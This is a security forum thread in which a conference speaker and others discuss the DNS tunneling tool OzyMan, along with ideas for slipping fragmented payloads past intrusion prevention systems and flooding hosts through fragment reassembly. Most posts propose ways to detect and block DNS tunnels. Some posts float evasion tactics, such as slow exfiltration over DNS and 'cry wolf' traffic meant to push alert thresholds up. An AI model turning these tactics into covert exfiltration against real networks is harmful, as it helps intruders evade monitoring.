Announcement

Collapse
No announcement yet.

Black Ops Requests?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Originally posted by hackajar
    This will still not protect against OzyMan

    I'll give you a hint: DNS TXT records are supposedly deprecated, so they really should not show up on your network.
    Yes. That is why it need to be coupled with the "second" line and used together. :-)

    Also, one method for anti-spam utilized txt records for hosts that should be sending e-mail.

    Comment


    • #17
      1) CAM table limits -- yeah, that's the obvious fix (limit MAC's per port getting into the table in the first place). Like I sort of implied, I haven't messed with that in a while.

      2) Regarding IPS attacks, what if you sent suitably fragmented payloads to a target such that the IPS wouldn't understand what it was seeing -- meanwhile, the payloads, once assembled, would actually echo back out (think ICMP Ping or HTTP TRACE) something that the IPS would mark as dangerous? That might work.

      3) I've become a bit of an OpenGL programmer. All those graphs? They animate in realtime.

      hackajar -- DNS is the best we've got in terms of storing data in the infrastructure. Though...heh. According to <a href="http://lwn.net/Articles/136319/">this link</a>, Linux will wait 30 seconds to reassemble a packet. One could feed a large number of hosts spoofed ping fragments, up to 65K, over 30 seconds -- then, upon reception of the final fragment, the target would get an instantaneous blast. There are ways of extending this further -- it just depends how many IP packets the target is willing to store in the reassembly queue (new fingerprinting mechanism! Cool!) -- but the question is whether it's really useful to flood targets like this anymore, save for the aforementioned IDS trickery.

      Heh. Neat. If I use this, I'll be sure to thank you directly.

      Comment


      • #18
        1) DNS TXT records aren't deprecated at all...no TXT, no SPF. SPF is quite popular. And anyway, Ozyman can just as easily use CNAME or even just straight up A records. The only real thing I want to show off DNS related at BH/DC is high speed operation, though. I've been doing video demos as of late. 65K/s, y0.

        2) I've never been an "exploit of the day" kinda speaker, though granted -- libpcap/libnids bashing would break alot of things (zlib 2 electric boogaloo).

        3) Cotman -- blocking UDP/53 except to your own servers does nothing; Ozyman is 100% RFC Compliant (or your money back) so it just proxies off your systems. And the tools we have, at least right now, to evaluate DNS traffic are pretty raw.

        4) Duplicated fragments -- yeah, there's some stuff there. Hmm.

        --Dan

        Comment


        • #19
          Originally posted by Effugas
          3) Cotman -- blocking UDP/53 except to your own servers does nothing; Ozyman is 100% RFC Compliant (or your money back) so it just proxies off your systems. And the tools we have, at least right now, to evaluate DNS traffic are pretty raw.
          Looking for per host, port 53 traffic that is greater than the average for a network would not take much work. If someone has 2x or 3x the "average" DNS traffic, they are suspect. No need to have the examination be advanced-- all you are looking for are potential abusers.

          At my work, we look at traffic use per host and service. When a "spike" is found that is out of the norm, then it is examined. Pushing too much traffic through a tunneled DNS "connection" could easily draw attention to yourself on such a network.

          Comment


          • #20
            So what does this say for OzyMan? Is signature based mitigation moot? We would have to rely on anomily based traffic spikes? What if I just wanted to send a little data? Or run a simple shell script that paced data going out on DNS using OzyMan. A sort of "low and slow" tatctic?

            OzyMan is certinly one hell of a sneaky sneaky tool!

            - Do note: I bash no one, only seek to inspire others to think outloud. BTW this is some good disscussion going on here!
            "Never Underestimate the Power of Stupid People in Large Groups"

            Comment


            • #21
              Originally posted by hackajar
              So what does this say for OzyMan? Is signature based mitigation moot? We would have to rely on anomily based traffic spikes? What if I just wanted to send a little data? Or run a simple shell script that paced data going out on DNS using OzyMan. A sort of "low and slow" tatctic?
              That is a very good point. A single host could be configured to "trickle" data out slowly enough to not be caught, and "fly under the radar." A file could be split across multiple IP addresses/hosts, and statistics could be skewed by installing software on many hosts to elevate DNS requests/traffic and increase the average for a network.

              Since the subject is here, I'm searching for what other counter measures could defeat the two part system.

              The "small amount of traffic" is valid and good and the others listed in the previous paragraph could work. Any others?


              OzyMan is certinly one hell of a sneaky sneaky tool!
              You won't find me disagreeing with this. :-)

              [Also, a "cry wolf attack" could be used where many requests are sent from many hosts often enough to force the trigger (2x or 3x or ?) to be elevated to 10x or more because the Networking people do not want to be bugged by "false alarms" with DNS so much.]

              Comment


              • #22
                Originally posted by TheCotMan
                [Also, a "cry wolf attack" could be used where many requests are sent from many hosts often enough to force the trigger (2x or 3x or ?) to be elevated to 10x or more because the Networking people do not want to be bugged by "false alarms" with DNS so much.]
                This is by far the bigest problem I fear, that keeps me up at night (not joking). Very good point.

                When do we filter out "known traffic" to look for the so called "real problem", and what if that traffic becomes rouge?
                "Never Underestimate the Power of Stupid People in Large Groups"

                Comment


                • #23
                  Originally posted by hackajar
                  When do we filter out "known traffic" to look for the so called "real problem", and what if that traffic becomes rogue?
                  Like a department that runs "webalyzer" with rDNS lookups enabled each month, and the insider scheduling the transfer through a DNS tunnel from that server?

                  Comment


                  • #24
                    I wonder if a signature could be written to look for "odd" data in dns packets. As OzyMan uses encryption, maybe check to see if data is not jiberish? Or thow a dictionary at some words in request to insure there's "real" data and not encrypted? Just a thought
                    "Never Underestimate the Power of Stupid People in Large Groups"

                    Comment


                    • #25
                      Originally posted by hackajar
                      I wonder if a signature could be written to look for "odd" data in dns packets. As OzyMan uses encryption, maybe check to see if data is not jiberish? Or thow a dictionary at some words in request to insure there's "real" data and not encrypted? Just a thought
                      Application of heuristics for detection could work, but that would be more work than just looking for spikes. Several things could be factored in, to help make the chances for identification better.

                      * Traffic spikes or use well above average?
                      * Mixed case in names returned?
                      * Ratio of vowels to consnants?
                      * What type records are being requested? (excessive TXT?)
                      * Average length of hostnames for specific host longer than average on net?
                      * Is and has anyone else used the off-site DNS other than the one user?
                      * Is rDNS of the target one of a Home ISP?
                      ...

                      And once a target is found suspect:
                      * If the records are A or CNAME, are they valid hostnames? (Does a separate lookup through root servers of the name provide success)
                      * Excessive hits to a specific host that does not have corresponding name matches in other applications (telnet, ftp, http, etc.) as would be expected.
                      * Excessive cache use in DNS where a single IP address is mapped to too many names
                      * Excessive cache use in DNS where many IP Addresses on significantly different subnets are associated with domain name lookups from the same host.
                      * Replay attacks for detection: Do the same lookups (replayed) provide the same results?
                      ...

                      Hewever, whatever patterns and actions would be used to determine if a lookup is risky or not could then be taken into consideration in the next use or version of OzyMan.

                      Then it becomes a matter of which developer has more time (like the Virus/Worm vs. AntiVirus writers' problem) and efficiency of use.

                      Comment


                      • #26
                        Cotman--

                        Indeed, the various heuristics you discuss are quite effective, given human monitoring. What we can't do is create a hard and fast rule that can be deployed automatically, akin to "no TXT records" and "only a certain number of name lookups per hour". Even entropy monitoring can be adapted against, though it deeply limits the bandwidth available in a DNS tunnel.

                        This is being a very productive discussion. Question -- someone mentioned earlier more "paketto-like" things for Scanrand. What kind of options are people looking for?

                        --Dan

                        Comment


                        • #27
                          Originally posted by Effugas
                          What we can't do is create a hard and fast rule that can be deployed automatically, akin to "no TXT records" and "only a certain number of name lookups per hour".
                          I have another proposal as a countermeasure.

                          Need: a Local Client I'll call LC and two private networks (N1, N2), a special DNS/Filter/PortForwarding and NAT combination (DNSS), and limits to only allow the DNS from the special (yet to be made) DNS/Filter/PortForwarding and NAT combination box I'll call "DNSS" .

                          DNSS is the only local node that is permitted to have outbound and incoming TCP/UDP port 53 traffic for zone transfers and lookups.
                          DNSS configured to have MX and TXT record lookups are disallowed, and reverse lookup always return the IP address of the query.
                          LC has an IP address on N1, and performs DNS Lookup for a host to the local DNSS.
                          DNSS Performs complete lookup to find real IP address and information if an entry does not exist in table, and the record has not expired. If lookup has changed, update the key and replace real IP address with the new value -- transparrent to the client, and without impacting previouse sessions.
                          DNSS examines special table where unique key is generated by:
                          1) LC IP address
                          2) Real IP Address found in DNS
                          and includes a field for
                          3) Host+domain name of lookup (for future lookups and compares)
                          and associates this key to an available N2 private network address and store in
                          4) Private (DNSS assigned) IP address for this LC/Real-IP-Address pair.
                          DNSS now makes layer 3/4 relay to forward traffic to/from one of the real IP addresses returned in the DNS query.
                          DNSS now tells LC that the IP address of the host is (Selected by DNSS as an N2 address) is the selected N2 address.
                          If LC needs to connect to the host specified by name, it connects to the N2 address.
                          DNSS then acts as a MiM to forward from the N2 address to the real address.

                          What does this do?
                          Allows the DNSS to limit what information is made available to the LC
                          Changes to the Real IP address found are never passed to the LC.
                          Information flow interanlly is controlled or at least restricted.

                          A few things may break in this scenario, and I would be concerned about how well it would scale for a Class A sized network, and there are other problems that may need to be resolved (Mail Servers would need to be able to do MX lookups, spam filtering mechanisms may need TXT records, some servers would probably need full access, networking folks would want a way to resolve reverse lookups for network analysis, etc.) but this seems like a way to break information passing from the outside, in [through a covert DNS channel.] It does not stop information passing from the inside, out.

                          (I'll proof-read this later)

                          Comment


                          • #28
                            Wow. Hideous, but it does make it very difficult for malicious traffic to enter the protected network (of course, anything you like can still leave, since some host has to NAT-resolve skjhkfdgjdgdfg.foo.com).

                            I note, this works right for A lookups and nothing else. You are right, this doesn't scale well.

                            Comment


                            • #29
                              Originally posted by Effugas
                              Wow. Hideous
                              Hah! :-D Yeah, that is a kind description to a "solution" that mixes different network layers and acts in a non-modular way; Certainly not elegant enough to be a hack, but perhaps twsited and brutish enough to be a kludge.

                              I note, this works right for A lookups and nothing else.
                              If the DNSS is configured to follow all PTR and CNAME to A lookups until either a single IP address (or list of IP addresses where one is selected) and is provided or 30 "hops" of follow is exceeded (to prevent looping DoS) and then use the resulting IP, then these lookups could be made to work too. (The client does not need to know what was necessary to get the IP, it just needs an IP that works for the application that wants it.) Anything that fails due to looping or other reasons can just default to the dead-state of "host not found."

                              You are right, this doesn't scale well.
                              Yeah, all the speed of a layer 7 proxy (gateway) with the ease of use of something nobody has ever used.

                              Though a CSS might help with scaling if TCP were used, it would be a pain to try to make it work for UDP.

                              Hey, thanks for the feedback. :-) ( I really mean this. Not being sarcastic. )

                              Have you selected a topic, or are you still looking? If you are still looking, how much longer will you accept suggestions?

                              Comment


                              • #30
                                Cat--

                                It takes alot not to be elegant enough to be a hack, but I think this qualifies. A restricted version of this may indeed solve certain problems captive portals have -- using your mechanism, every name gets a temporary IP mapping; post-login, such mappings get NAT'd back to their correct external IP. I like this, since you don't need to do the lookup until the user correctly authenticates. (The problem is that userspace apps may cache DNS responses before authentication, so you need to give them legitimate stuff. I've thought about mechanisms along these lines before, but you've made me realize they're actually feasible. Ah, the pain of the white hat...just when you find a new toy, you go ahead and kill it...)

                                I'm enjoying this collaboration greatly. You'll definitely be getting alpha code from me. Regarding topic selection -- I don't think I'm doing a single topic talk this year, so once again I'll be coding things up until the night before the Black Hat talk :)

                                --Dan

                                Comment

                                Working...
                                X